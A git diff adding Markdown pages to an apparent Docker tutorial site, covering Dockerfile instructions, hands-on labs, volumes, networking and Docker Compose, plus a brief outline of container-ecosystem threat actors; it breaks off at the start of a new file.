+why layers ? + +to save on computational efforts when building images , and bandwidth (aka pulling and pushing ) them + +Build Container images + +```bash +FROM node:alpine +WORKDIR /app +COPY package*.json ./ +RUN npm install +COPY ./ ./ +CMD ["npm", "start"] + +``` + +This Dockerfile contains instructions needed to build a basic Node.js app image on Docker. When you run a `docker build` command, Docker starts executing these instructions one at a time, iteratively. + +![](./images/image-layer.png) + +Each time a command is executed from the Dockerfile, a new image layer is created on top of the existing image. This process is iterated until Docker reads the last command of the Dockerfile. Each instruction created a new image. + +![](./images/image-layer-execute.png) + + +# Composition of a Docker Image + +typically , an image can constitute the following + +- Base Image + + - all of the container iamges are created from the base image. this ia an emoty first layer that allows users to build their images form scratch + + - if you do not want to create your base image from scratch, you can use an official Docker image like Centos as your base image or customize one of the official Docker images to your requirements. +
+ +- Parent Image + + - the parent images is most cases, the first Docker image layer. This is foundation of all other layers in your Docker. Thus, this layer provides the basic building blocks for container environments. +
+ +- Layers + + - The other Docker layers are added to the base image using a code to allow them to run in a container. Docker’s default status displays all the top-layer images, including file sizes, tags, and repositories. Caching of intermediate layers makes it easier to view the top layers. Storage drives in Docker manage the contents in image layers. + +- Container layer + + - Besides creating a new container, a Docker image creates a container or writable layer. It hosts the changes that you make to your running container. This layer also stores the deleted and newly written files and changes made to the existing files. This layer is also useful when customizing containers. + +- Docker manifest + +The list of all image layers created by specific image names is known as a Docker manifest. These manifests are used the same way you would use an image name in the ```docker run``` and ```pull``` commands. + + +To build a Docker container image using a Dockerfile, follow these steps: + +- Create a new directory and navigate to it in your terminal. +- Inside the directory, create a file named ```Dockerfile``` (without any file extension). +- Inside the Dockerfile, specify the base image you want to build from using the "FROM" directive. For example: + +```bash +FROM alpine +``` + +- Add any additional instructions to the Dockerfile, such as installing packages, copying files, or setting environment variables. +- Save the Dockerfile. +- In your terminal, navigate to the directory containing the Dockerfile. +- Run the `docker build` command, followed by the desired name and tag for the image, and the path to the Dockerfile: + +```docker build -t my-image:latest .``` + +The Docker engine will now build the image based on the instructions in the Dockerfile. +Once the build is complete, you can verify that the image was created by running the "docker images" command: + +```bash +docker images +``` + +# Dockerfile instructions with example + +1.`FROM`: This instruction sets the base image for the Docker container. For example: + +```FROM ubuntu:latest``` + +2.`RUN`: This instruction runs a command in the container. For example: + +```RUN apt-get update``` + +3.`COPY`: This instruction copies files from the host machine to the container. For example: + +```COPY app/ /app``` + +4.`ADD`: This instruction is similar to COPY, but it can also handle URL sources and automatically decompress compressed files. For example: + +```ADD https://example.com/app.tar.gz /app``` + +5.`ENV`: This instruction sets environment variables in the container. For example: + +```ENV LANG=en_US.UTF-8``` + +6.`WORKDIR`: This instruction sets the working directory for the container. For example: + +```WORKDIR /app``` + +7.```EXPOSE```: This instruction exposes a port on the container to be accessed from the host machine. For example: + +```EXPOSE 8080``` + +8.```CMD```: This instruction sets the default command to be run when the container is started. For example: + +```CMD ["python", "app.py"]``` + +9.```ENTRYPOINT```: This instruction sets the default command to be run when the container is started, but it cannot be overridden by command-line arguments. For example: + +```ENTRYPOINT ["python", "app.py"]``` + + +# Lab 1 + + Begin by creating a new file called "Dockerfile" in your project directory. + In the Dockerfile, we will first specify the base image that we will be using. For this example, we will be using the latest version of Ubuntu as our base image. + +```bash +FROM ubuntu:latest +``` + + Next, we will run the necessary commands to install Git on the base image. + +```bash +RUN apt-get update +RUN apt-get install -y git + +``` +Once the installation is complete, we will set the default command to run when the container starts. In this case, we will set it to run the Git version command to confirm that Git is installed and functioning correctly. + +```bash +CMD ["git", "--version"] +``` + +Save the Dockerfile and close it. +To build the Docker image, we will use the "docker build" command and specify the path to the Dockerfile as an argument. + +```bash +docker build -t my_git_image . + +``` + +This will start a new container based on the "my_git_image" image and run the default command specified in the Dockerfile. The output should show the version of Git installed in the image. + +# Lab 2 + +In the Dockerfile, specify the base image you want to use. For example: + +```bash +FROM ubuntu:20.04 + +``` +Add the ADD instruction to your Dockerfile to copy files or directories from your local system into the image. For example: + +```bash +ADD my_file.txt /app/ +ADD my_directory /app/ + +``` + +Use the RUN instruction to execute any necessary commands or installs for your image. + +Use the CMD instruction to specify the command that will be run when a container is started from this image. + +Build the Docker image using the following command: + +```bash +docker build -t my_image_name . + +``` +Run the image using the following command: + +```bash +docker run -d my_image_name +``` + +# Lab 2 + +`Dockerfile`in your favorite text editor and add the following content to it: + +```bash +FROM ubuntu:18.04 +CMD ["echo", "Hello, World!"] +``` + +This `Dockerfile` specifies that we want to use the `ubuntu:18.04` base image and run the echo command with the arguments`"Hello, World!"` when the container is started. + +```bash +docker build -t myimage . +docker run myimage +``` + +# Lab 3 + +In the Dockerfile, specify the base image that your image will be built on. For this example, we will use the alpine base image, which is a lightweight version of Linux: + +```bash +FROM alpine + +``` + +Next, add the COPY instruction to copy a file or directory from your local machine into the image. For example, if you want to copy the file `hello.txt` from your current directory into the image, you would use the following instruction: + +```bash +COPY hello.txt / + +``` + +ou can also specify a different destination for the file. For example, if you want to copy hello.txt into the /app directory inside the image, you would use the following instruction: + +```bash +COPY hello.txt /app/ + +``` + +Now that you have specified the base image and the files to be copied, you can build your Docker image. Run the following command to build the image, replacing my-image with the desired name for your image: + +```bash + +docker build -t my-image . + +``` + +To verify that the image was built successfully and that the file was copied into the image, you can run the following command to view the list of available Docker images: + +```bash +docker images + +``` + +You should see your new image listed in the output. To run the image, use the docker run command, followed by the name of the image: + +```bash +docker run my-image + +``` + +# Lab 4 + +here is an example of creating a Python app with an Entrypoint instruction: + +First, create a new directory for your app and navigate to it in the command line. +Create a file called `app.py` and add the following code: + +```python +def main(): + print("Hello, world!") + +if __name__ == "__main__": + main() + +``` +Next, create a file called `Dockerfile` and add the following code: + +```bash +FROM python:3.8-slim + +COPY app.py /app/app.py + +ENTRYPOINT ["python", "/app/app.py"] + + +``` + +Build the Docker image by running the following command: + +```bash +docker build -t my-app . +``` + +Run the Docker image by using the following command: + +```bash +docker run my-app + +``` + +# Lab 5 + +```bash +FROM nginx:alpine +WORKDIR /var/www/html +COPY . . +EXPOSE 80 +CMD ["nginx", "-g", "daemon off;"] + +``` + +This Dockerfile will use the nginx:alpine image as a base, set the working directory to /var/www/html, copy all the files in the current directory (.) to the working directory, expose port 80, and start the nginx daemon. + +Now let's create a sample HTML file called`index.html`: + +```html + + + Nginx Workdir Example + + +

Welcome to the Nginx Workdir Example

+ + + + +``` +Now we can build and run the Docker container using the following commands: + +```bash +docker build -t nginx-workdir . +docker run -p 8080:80 nginx-workdir + + +``` +This will build the Docker image with the tag nginx-workdir and run the container, mapping port 8080 on the host machine to port 80 in the container. + +To verify that everything is working, open your web browser and navigate to `http://localhost:8080`. You should see the content of the index.html file displayed. + +That's it! You have successfully created a Docker container using the `WORKDIR` instruction to set the working directory for the nginx daemon. + +# Lab 6 + +- Pull the Nginx image from Docker Hub: + +```bash +docker pull nginx + +``` + +- Create a directory on your local machine that you want to use as the volume for Nginx: + +```bash +mkdir /path/to/volume +``` + +- Run the Nginx container and mount the volume using the -v flag: + +```bash +docker run -d -p 80:80 -v /path/to/volume:/usr/share/nginx/html:ro nginx +``` +- Test that the volume is working by creating a file in the volume directory on your local machine: + +```echo "Hello, World!" > /path/to/volume/index.html``` + +5. Visit http://localhost in your web browser to see the contents of the volume displayed in the Nginx container. + +Note: The -d flag runs the container in detached mode, the -p flag maps port 80 on the host to port 80 in the container, and the :ro flag makes the volume read-only inside the container. + +## Storing data in a container + +- Storing data in a container(mounts, volumes, etc.)
+- Networking in containers
+ +## Storing data in a docker container + +There are several options for storing data in a docker container: + +- Use a volume: Docker volumes allow you to persist data outside of the container, so it can be shared between multiple containers or saved even if the container is stopped or removed. You can create a volume using the "docker volume create" command and then mount it to a specific directory in your container using the "-v" flag in the "docker run" command. + +- Create a volume using the docker volume create command: + +```bash +$ docker volume create data-volume + +``` + +- Run a docker container and mount the volume using the -v flag: + +```bash +$ docker run -d --name my-container -v data-volume:/data ubuntu:latest + +``` + +- Check if the volume is mounted to the container by using the docker inspect command: + +```bash +$ docker inspect my-container | grep Mounts + +``` + +You should see output similar to this: + +```bash +"Mounts": [ + { + "Type": "volume", + "Name": "data-volume", + "Source": "/var/lib/docker/volumes/data-volume/_data", + "Destination": "/data", + "Driver": "local", + "Mode": "", + "RW": true, + "Propagation": "" + } + ], + +``` + +Now, any data that you write to the /data directory inside the container will be persisted in the volume. + +For example, you can create a file in the /data directory: + +```bash +$ docker exec -it my-container touch /data/test.txt + + +``` + +To verify that the data has been persisted, you can run another container and mount the same volume: + +```bash +$ docker run -it --name my-container-2 -v data-volume:/data ubuntu:latest bash + +``` + +Inside the new container, you should be able to see the test.txt file: + +```bash +$ ls /data +test.txt + +``` +This demonstrates how you can use a volume to store data in a docker container. The data will persist even if the container is stopped or deleted, as it is stored in the volume, which is managed by Docker. + +Use a bind mount: + +A bind mount is a file or directory on the host machine that is mounted into a container. This allows you to access data on the host machine from within the container. You can create a bind mount using the `-v` flag in the "docker run" command, specifying the path to the file or directory on the host as well as the desired mount point in the container. + +Create a directory on the host machine that you want to use as the bind mount. For example: + +```bash +mkdir /data + +``` +Run the docker container, using the -v flag to specify the bind mount. The syntax is `-v host_directory:container_directory`. For example: + +```bash +docker run -d -p 8080:80 -v /data:/var/www/html my_web_server + +``` +This will mount the /data directory on the host machine to the /var/www/html directory in the container, which is typically the root directory for web server content. + +- You can now add or modify files in the /data directory on the host machine and they will be automatically reflected in the container's /var/www/html directory. +- To verify that the bind mount is working, you can create a test file in the /data directory on the host machine: + + +```bash +echo "This is a test file" > /data/test.txt +``` +Then, open a shell in the container and check if the file exists in the `/var/www/html` directory: + +```bash +docker exec -it my_web_server /bin/bash +ls /var/www/html + +``` +You should see the test.txt file listed in the output. + +Use a data container: A data container is a container specifically designed to store data that can be shared between multiple containers. You can create a data container using the `docker create` command, and then mount the data container's volume to a specific directory in other containers using the "-v" flag in the "docker run" command. + +Create a new data container using the docker create command. For example: + +```bash +docker create -v /data --name data-container busybox /bin/true + +``` +This creates a data container with a volume at /data and a name of data-container. + +Start the data container using the docker start command. For example: + +```bash + +docker run -it --volumes-from data-container --name app-container ubuntu bash + +``` +This creates a new container named app-container that will use the volume from the data container. + +- In the app-container, you can now access the data stored in the data-container. For example: + +```bash +root@7bd72f1f0f77:/# ls /data + +``` +This will show the contents of the /data volume in the data-container. + +To stop the data container, use the docker stop command. For example: + +```bash +docker stop data-container + +``` +This will stop the data container, but the data will still be available in the app-container. + +To delete the data container, use the docker rm command. For example: + +```bash +docker rm data-container + +``` + +This will delete the data container, but the data will still be available in the app-container. + +4. Use a host path: You can also store data directly on the host machine and access it from within the container using the "-v" flag in the "docker run" command, specifying the path on the host machine as the mount point in the container. However, this option is not recommended as it can lead to issues with container portability and separation of concerns. + +To use a host path to store data in Docker, you will need to use the "-v" flag in the "docker run" command to specify the host path and the container path for the data volume. Here is an example using a MongoDB container: + +First, create a directory on your host machine to store the data: + +```bash +mkdir -p /data/mongodb +``` + +Run the MongoDB container, using the "-v" flag to mount the host path as a data volume in the container: + +```bash +docker run -d --name mongodb -v /data/mongodb:/data/db mongo:latest +``` +You can verify that the data volume is being used by the container by checking the output of the "docker inspect" command: + +```bash +docker inspect mongodb | grep -i "Mounts" +``` + +This should return a list of all the mounted data volumes, including the host path that you specified in the "docker run" command. + +Note: Make sure that the host path that you specify in the "-v" flag exists and is readable/writable by the container. Otherwise, the container may not start or may have issues accessing the data volume. + +# Networking in containers + +There are two types of networking in Docker: + +- Bridge networking: This is the default networking mode in Docker. It creates a virtual network between containers on the same host. Each container is given its own IP address within this network, and containers can communicate with each other using this network. + +First, create a Dockerfile that will build our container: + +```bash + FROM alpine + CMD ["echo", "Hello World!"] + +``` + +Build the image using the following command: + +```bash +docker build -t hello-world . +docker run -it hello-world +``` + +Inspect the container's networking configuration using the following command: + +```bash +"NetworkSettings": { + "Bridge": "", + "SandboxID": "4f3c70f4f74b1dc5d5e5e3f5e5ed72c5e5e1f2613e1644b2aa5b004f2ab2d9e8", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": {}, + "SandboxKey": "/var/run/docker/netns/4f3c70f4f74b", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "f48c68e9ce012791d63f0b3ee3b3a85d6c7f6ed5b6c4b6e5b6d5b6c2e5e5f6d4", + "Gateway": "172.17.0.1", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "MacAddress": "02:42:ac:11:00:02", + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "5e5f5c5d5e5d5e5f5d5f5c5e5d5e5d5d5e5f5d5e5f5c5d5e5d5e5f5c5e5f5d5e", + "EndpointID": "f48c68e9ce012791d63f0b3ee3b3a85d6c7f6ed5b6c4b6e5b6d5b6c2e5e5f6d4", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gate + + +``` + +- Overlay networking: This type of networking allows you to connect multiple Docker hosts into a single virtual network. This is useful for situations where you have multiple hosts running Docker containers, and you want them to be able to communicate with each other. + +Overlay networking in Docker allows containers to communicate with each other across multiple hosts. This is useful for situations where you have multiple Docker hosts running and you want to create a network that spans across those hosts. + +To demonstrate overlay networking, we will create two Docker hosts and a single network that will be shared between them. We will then create two containers, one on each host, and demonstrate that they can communicate with each other through the overlay network. + +First, we will create two Docker hosts using Docker Machine. For this example, we will use two virtual machines running on VirtualBox. + +```bash +docker-machine create --driver virtualbox host1 +docker-machine create --driver virtualbox host2 + +``` + +Next, we will create an overlay network on one of the hosts. We will name this network "mynetwork" and specify the `--attachable` flag so that other containers can attach to it + +```bash +eval $(docker-machine env host1) +docker network create --driver overlay --attachable mynetwork + +``` + +Now that the network has been created, we can deploy containers on both hosts and attach them to the network. + +On host1: + +```bash + +eval $(docker-machine env host1) +docker run -d --name container1 --network mynetwork busybox + +``` + +On host2: + +```bash +eval $(docker-machine env host2) +docker run -d --name container2 --network mynetwork busybox + + +``` +Now that both containers are attached to the same overlay network, we can verify that they can communicate with each other. + +On host1: + +```bash +eval $(docker-machine env host1) +docker exec -it container1 ping -c 3 container2 + +``` + +On host2: + +```bash +eval $(docker-machine env host2) +docker exec -it container2 ping -c 3 container1 + +``` + +If the ping commands are successful, it means that the containers are able to communicate with each other through the overlay network. + +This is just a simple example of how overlay networking can be used in Docker. There are many other uses and configurations that can be explored. + +# Docker Compose + +Docker Compose is a tool for defining and running multi-container Docker applications. With Compose, you use a YAML file to configure your application's services. Then, with a single command, you create and start all the services from your configuration. + +To install Docker Compose, follow the instructions for your operating system: + +```bash +# For macOS or Linux: +sudo curl -L "https://github.com/docker/compose/releases/download/1.28.5/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose +sudo chmod +x /usr/local/bin/docker-compose + +# For Windows: +Download the Docker Compose binary from https://github.com/docker/compose/releases/download/1.28.5/docker-compose-Windows-x86_64.exe and save it to a location on your PATH (e.g., C:\Program Files\Docker). + + +``` +Once Docker Compose is installed, you can use it to create and start your multi-container Docker application by using the docker-compose up command. For example, suppose you have a YAML file called docker-compose.yml that defines your application's services like this: + +```yaml +version: '3' +services: + web: + build: . + ports: + - "5000:5000" + volumes: + - .:/app + redis: + image: "redis:alpine" + +``` + +You can start all of these services with the following command: + +```bash +docker-compose up + +``` +This command will build the web service image, create and start the web and redis containers, and attach the terminal to the logs of the running containers. + +# Docker Compose Build + +```plaintext +docker-compose build +``` + +### Redeploy just one Service + +```plaintext +docker-compose up $SERVICE_NAME +``` + +### start all services / container using docker compose + +```plaintext +docker-compose up + +// Specify a custom filepath for your +//docker-compose file +// (it assumes docker-compose.yml in +//your current directory by default) +ocker-compose -f custom-docker-compose.yml up + +// Apply multiple compose files (changes in latter) + +docker-compose -f docker-compose.yml docker-compose-production.yml +``` + +# sample docker-compose file + +``` + +#docker-compose.yml file +version: '3' +services: + # Your web application => Container + web: + build: . + ports: + - "5000:5000" + + # Redis cache container + redis: + image: "redis:alpine" + + +``` + +``` + +version: "3" + +networks: + backend: + driver: bridge + +services: + app: + build: + context: . + dockerfile: Dockerfile + container_name: app + image: ${REGISTRY}/my-project-name + restart: always + ports: + - "80:80" + - "443:443" + depends_on: + - db + networks: + - backend + env_file: + - ./.env + + db: + image: mariadb:10.5 + container_name: db + restart: always + networks: + backend + volumes: + - mysql-data:/var/lib/mysql + environment: + - FOO=bar + - SOME_ENV_VAR=${SUBSTITUTED_VARIABLE} + env_file: + - ./.env + +volumes: + mysql-data: + driver: local + + +``` + +labels + +``` +services: + web: + labels: + com.app.description: "My web app" + + +``` + + +[Docker CheatSheet](https://blog.cloudnativefolks.org/the-ultimate-docker-cheatsheet-for-everyone#heading-docker-compose) \ No newline at end of file diff --git a/content/en/containersecurity/b9.attack-surface 2.md b/content/en/containersecurity/b9.attack-surface 2.md new file mode 100644 index 0000000..2853cb4 --- /dev/null +++ b/content/en/containersecurity/b9.attack-surface 2.md @@ -0,0 +1,32 @@ +--- +title: "Attack surface of the container ecosystem " +slug: "Attack-surface-of-the-container-ecosystem" +--- + +## Container Technology Archiecture + +1. Developer systems (generate images and send them to testing and accreditation) +2. Testing and accreditation systems (validate and verify the contents of images, sign +images, and send images to the registry) +3. Registries (store images and distribute images to the orchestrator upon request) +4. Orchestrators (convert images into containers and deploy containers to hosts) +5. Hosts (run and stop containers as directed by the orchestrator) + + +![](./images/container-technology-arch.png) + + +## Attack surface of the container ecosystem + +![](./images/Container-Threat-model.png) + + + +One way to start thinking about the threat model is to consider the actors involved. These might include: + +1. External attackers attempting to access a deployment from outside +2. Internal attackers who have managed to access some part of the deployment +3. Malicious internal actors such as developers and administrators who have some level of privilege to access the deployment +3. Inadvertent internal actors who may accidentally cause problems +4. Application processes that, while not sentient beings intending to compromise +your system, might have programmatic access to the system \ No newline at end of file diff --git a/content/en/docker/_overview 2.md b/content/en/docker/_overview 2.md new file mode 100644 index 0000000..b3eda9a --- /dev/null +++ b/content/en/docker/_overview 2.md @@ -0,0 +1,74 @@ +--- +title: Overview +url: "docker/overview" +aliases: +- "/docker" +--- + + +### Table of Content +| Title | Link | +| --------- | ------- | +|1.Pre-requisit for this lab | [Lab](https://kubedaily.com/docker/pre-requisit-for-this-lab/) | +|2.Docker Hello World Example | [Lab](https://kubedaily.com/docker/docker-hello-world-example/) | +|3.Docker Image Filtering | | [Lab](https://kubedaily.com/docker/docker-image-filtering/) | +|4.Images and Container As Tar file | [Lab](https://kubedaily.com/docker/images-and-container-as-tar-file/) | +|5.Push first Nginx Web app To DockerHub | [Lab](https://kubedaily.com/docker/push-first-nginx-web-app-to-dockerhub/) | +|6.Build a Base Image from Scratch | [Lab](https://kubedaily.com/docker/build-a-base-image-from-scratch/) | +|7.Dockerfile Lab - ADD instruction | [Lab](https://kubedaily.com/docker/dockerfile-lab-add-instruction/) | +|8.Dockerfile Lab - COPY instruction | [Lab](https://kubedaily.com/docs/copy-instruction/) | +|9.Dockerfile Lab - CMD instruction | [Lab](https://kubedaily.com/docs/cmd-instruction/) | +|10.Dockerfile Lab - Entrypoint instruction | [Lab](https://kubedaily.com/docs/entrypoint-instruction/) | +|11.Dockerfile Lab - WORKDIR instruction | [Lab](https://kubedaily.com/docs/workdir-instruction/) | +|12.Dockerfile Lab - RUN instruction | [Lab](https://kubedaily.com/docs/run-instruction/) | +|13.Dockerfile Lab - ARG instruction | [Lab](https://kubedaily.com/docs/arg-instruction/) | +|14.Dockerfile Lab - Volume instruction | [Lab](https://kubedaily.com/docs/arg-instruction/) | +|15.Dockerfile Lab - USER instruction | [Lab](https://kubedaily.com/docs/user-instruction/) | +|16.Dockerfile Lab - HEALTHCHECK instruction | [Lab](https://kubedaily.com/docs/healthcheck-instruction/) | +|17.Dockerfile Lab - ENV instruction | [Lab](https://kubedaily.com/docs/env-instruction/) | +|18.Dockerfile Lab - ONBUILD instruction | [Lab](https://kubedaily.com/docs/onbuild-instruction/)| +|19.Running multiple docker containers from CLI | [Lab](https://kubedaily.com/docs/multiple-container/) | +|20.Write First Docker Compose file | [Lab](https://kubedaily.com/docs/write-first-docker_compose/) | +|21.Docker Compose with Volume Mount | [Lab](https://kubedaily.com/docs/docker-compose-volumes/) | +|22.Build Own Dockerfile and Docker Compose with Custom configuration| [Lab](https://kubedaily.com/docs/custom-docker-compose/) | +|23.Simple php apache and database using docker compose| [Lab](https://kubedaily.com/docs/php-database-docker-compose/) | +|24.Host Volume Mount - Data persistentence| [Lab](https://kubedaily.com/docs/host-volume-mount/) | +|25.Named Volume Mount - Data persistentence| [Lab](https://kubedaily.com/docs/name-volume-mount/) | +|26.Docker Compose CLI - Build Command| [Lab](https://kubedaily.com/docs/docker-compose-build/) | +|27.Docker Compose CLI - Config Command| [Lab](https://kubedaily.com/docs/docker-compose-config/) | +|28.Docker Compose CLI - CP Command| [Lab](https://kubedaily.com/docs/docker-compose-cp/) | +|29.Docker Compose CLI - Create Command| [Lab](https://kubedaily.com/docs/docker-compose-create/) | +|30.Docker Compose CLI - Down Command| [Lab](https://kubedaily.com/docs/docker-compose-down/) | +|31.Docker Compose CLI - Events Command| [Lab](https://kubedaily.com/docs/docker-compose-events/) | +|32.Docker Compose CLI - Exec Command| [Lab](https://kubedaily.com/docs/docker-compose-exec/) | +|33.Docker Compose CLI - Images Command| [Lab](https://kubedaily.com/docs/docker-compose-images/) | +|34.Docker Compose CLI - Kill Command| [Lab](https://kubedaily.com/docs/docker-compose-kill/) | +|35.Docker Compose CLI - logs Command| [Lab](https://kubedaily.com/docs/docker-compose-logs/) | +|36.Docker Compose CLI - ls Command| [Lab](https://kubedaily.com/docs/docker-compose-ls/) | +|37.Docker Compose CLI - Pause/unpause Command| [Lab](https://kubedaily.com/docs/docker-compose-pause/) | +|38.Docker Compose CLI - Port Command| [Lab](https://kubedaily.com/docs/docker-compose-port/) | +|39.Docker Compose CLI - ps Command| [Lab](https://kubedaily.com/docs/docker-compose-port/) | +|40.Docker Compose CLI - pull Command| [Lab](https://kubedaily.com/docs/docker-compose-pull/) | +|41.Docker Compose CLI - push Command| [Lab](https://kubedaily.com/docs/docker-compose-push/) | +|42.Docker Compose CLI - restart Command| [Lab](https://kubedaily.com/docs/docker-compose-restart/)| +|43.Docker Compose CLI - rm Command| [Lab](https://kubedaily.com/docs/docker-compose-rm/) | +|44.Docker Compose CLI - run Command| [Lab](https://kubedaily.com/docs/docker-compose-run/) | +|45.Setup local network| [Lab](https://kubedaily.com/docs/local-network/) | +|46.Setup Remote network| [Lab](https://kubedaily.com/docs/remote-network/) | +|48.Newtorking in Docker Compose| [Lab](https://kubedaily.com/docs/docker-compose-net/) | +|49.Newtorking in Docker Compose with ngnix| [Lab](https://kubedaily.com/docs/docker-compose-ngnix-net/) | +|50.Docker Wordpress Example| [Lab](https://kubedaily.com/docs/docker-wordpress/) | + +Todo List + +51. +52. +53. + + + + + +What next +- [Container Security Track](https://kubedaily.com/docs/0.0.1/container-security/) +- [Kubernetes Workshop Track](https://kubedaily.com/docs/0.0.1/k8s/) diff --git a/content/en/docker/a1.pre-requist 2.md b/content/en/docker/a1.pre-requist 2.md new file mode 100644 index 0000000..4a329ac --- /dev/null +++ b/content/en/docker/a1.pre-requist 2.md @@ -0,0 +1,25 @@ +--- +title: "Pre-requisit for this lab" +slug: Pre-requisit-for-this-lab +--- + + + +> Here are the steps to create a Docker Hub account: + +1. Go to https://hub.docker.com/signup and click on the "Sign Up" button. +
+2. Fill out the registration form with your name, email address, and password. +
+3. Agree to the terms of service and privacy policy by checking the box. +
+4. Click on the "Sign Up" button to complete the registration process. +
+5. You will receive a verification email from Docker Hub. Follow the link in the email to verify your email address. +
+ +6. Once your email address is verified, you can log in to Docker Hub using your email address and password. +
+ +You can now create and manage your repositories, and upload your Docker images to share with the community. +That's it! You now have a Docker Hub account and you can start using it to store, share, and distribute your Docker images. \ No newline at end of file diff --git a/content/en/docker/a10.Entrypoint-instruction 2.md b/content/en/docker/a10.Entrypoint-instruction 2.md new file mode 100644 index 0000000..6de2869 --- /dev/null +++ b/content/en/docker/a10.Entrypoint-instruction 2.md @@ -0,0 +1,62 @@ +--- +title: "Dockerfile Lab - Entrypoint instruction " +description: "Dockerfile Lab 4 " +slug: "Dockerfile-Lab-Entrypoint-instruction" +--- + +#### Running a Docker Container with ENTRYPOINT + +Let's learn the details in this case by actually executing ENTRYPOINT in exec form. The following is an example of a Dockerfile that uses the exec form of ENTRYPOINT, which outputs a character string on the command line. + +```dockerfile +FROM alpine +ENTRYPOINT ["echo", "Hello!"] + +``` + +#### Build dockerfile + +```sh +➜ Dockerfile git:(main) βœ— docker build -t sangam14/entrypoint-dockerfile -f dockerfile.entrypoint . +[+] Building 3.2s (6/6) FINISHED + => [internal] load build definition from dockerfile.entrypoint 0.0s + => => transferring dockerfile: 94B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 3.1s + => [auth] library/alpine:pull token for registry-1.docker.io 0.0s + => [1/1] FROM docker.io/library/alpine@sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a 0.0s + => => resolve docker.io/library/alpine@sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a 0.0s + => => sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a 1.64kB / 1.64kB 0.0s + => => sha256:c41ab5c992deb4fe7e5da09f67a8804a46bd0592bfdf0b1847dde0e0889d2bff 528B / 528B 0.0s + => => sha256:d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239 1.49kB / 1.49kB 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:0d5a798a648339f8ea8094b10568eb2dc44540480deff55f680dfd689f787013 0.0s + => => naming to docker.io/sangam14/entrypoint-dockerfile 0.0s + ``` + +#### run docker container + +```sh + Dockerfile git:(main) βœ— docker run sangam14/entrypoint-dockerfile +Hello! +➜ Dockerfile git:(main) βœ— docker run sangam14/entrypoint-dockerfile echo "sangam" +Hello! echo sangam +➜ Dockerfile git:(main) βœ— + +``` + +#### Overwrite with `--entrypoint` option + +On the other hand, in ENTRYPOINT, you can change the instruction by using the option of `β€”entrypoint` as follows. + +```sh +docker run --rm --entrypoint sh sangam14/entrypoint-dockerfile -c 'echo "test"' +test + +``` + +CMD and ENTRYPOINT have similar roles and are confusing, but they have different functions. CMD, ENTRYPOINT, and ENTRYPOINT also behave differently between shell form and exec form, so it's a good idea to use each function properly. The instructions in the Dockerfile are a bit complicated, but you can use them effectively if you understand them. + + diff --git a/content/en/docker/a11.WORKDIR-instruction 2.md b/content/en/docker/a11.WORKDIR-instruction 2.md new file mode 100644 index 0000000..80f3131 --- /dev/null +++ b/content/en/docker/a11.WORKDIR-instruction 2.md @@ -0,0 +1,34 @@ +--- +title: "Dockerfile Lab - WORKDIR instruction " +description: " Dockerfile Lab 5 " +slug: "Dockerfile-Lab-WORKDIR-instruction" +--- + +The WORKDIR command is used to define the working directory of a Docker container at any given time. The command is specified in the Dockerfile. + +Any RUN, CMD, ADD, COPY, or ENTRYPOINT command will be executed in the specified working directory. + +# WORKDIR instruction Dockerfile for Docker Quick Start + +```Dockerfile +FROM ubuntu +WORKDIR /var/www/html +RUN apt-get update && apt-get install -y nginx +COPY index.html . +ENTRYPOINT ["nginx", "-g", "daemon off;"] +``` +#### build dockerfile + +```sh +docker build -t sangam14/workdir-dockerfile -f dockerfile.workdir . + +``` +#### run docker container + +```sh +docker run -p 80:80 sangam14/workdir-dockerfile + +``` +output + +![](./images/ngnix.png) diff --git a/content/en/docker/a12.RUN-instruction 2.md b/content/en/docker/a12.RUN-instruction 2.md new file mode 100644 index 0000000..1224b81 --- /dev/null +++ b/content/en/docker/a12.RUN-instruction 2.md @@ -0,0 +1,58 @@ +--- +title: "Dockerfile Lab - RUN instruction " +slug: "Dockerfile-Lab-RUN-instruction" +--- + +The RUN command is the central executing directive for Dockerfiles. It takes a command as its argument and runs it to form the image. Unlike CMD, it actually is used to build the image (forming another layer on top of the previous one which is committed). + + +#### create dockerfile with following content + +```dockerfile +FROM ubuntu +RUN id +RUN useradd --create-home -m -s /bin/bash dev +# Add a fun prompt for dev user of my-app +# whale: "\xF0\x9F\x90\xB3" +# alien:"\xF0\x9F\x91\xBD" +# fish:"\xF0\x9F\x90\xA0" +# elephant:"\xF0\x9F\x91\xBD" +# moneybag:"\xF0\x9F\x92\xB0" +RUN echo 'PS1="\[$(tput bold)$(tput setaf 4)\]my-app $(echo -e "\xF0\x9F\x90\xB3") \[$(tput sgr0)\] [\\u@\\h]:\\W \\$ "' >> /home/dev/.bashrc && \ + echo 'alias ls="ls --color=auto"' >> /home/dev/.bashrc + +RUN mkdir /myvol +RUN echo "hello DQS Guide" > /myvol/greeting +RUN ["chmod", "664", "/myvol/greeting"] +RUN ["chown", "dev:dev", "/myvol/greeting"] +VOLUME /myvol + +USER dev +RUN id + +CMD ["/bin/bash"] + +``` + +### build docker container + +```bash + ➜ docker build -t sangam14/run-dockerfile -f dockerfile.run . +``` + + +#### run docer container + +```sh +➜ Dockerfile git:(main) βœ— docker run -it sangam14/run-dockerfile +``` +#### added user as my-app with whale emoji + +```sh +my-app 🐳 [dev@0270ab5e6f0c]:/ $ ls +bin boot dev etc home lib media mnt myvol opt proc root run sbin srv sys tmp usr var +my-app 🐳 [dev@0270ab5e6f0c]:/ $ cat myvol/greeting +hello DQS Guide + +``` + diff --git a/content/en/docker/a13.ARG-instruction 2.md b/content/en/docker/a13.ARG-instruction 2.md new file mode 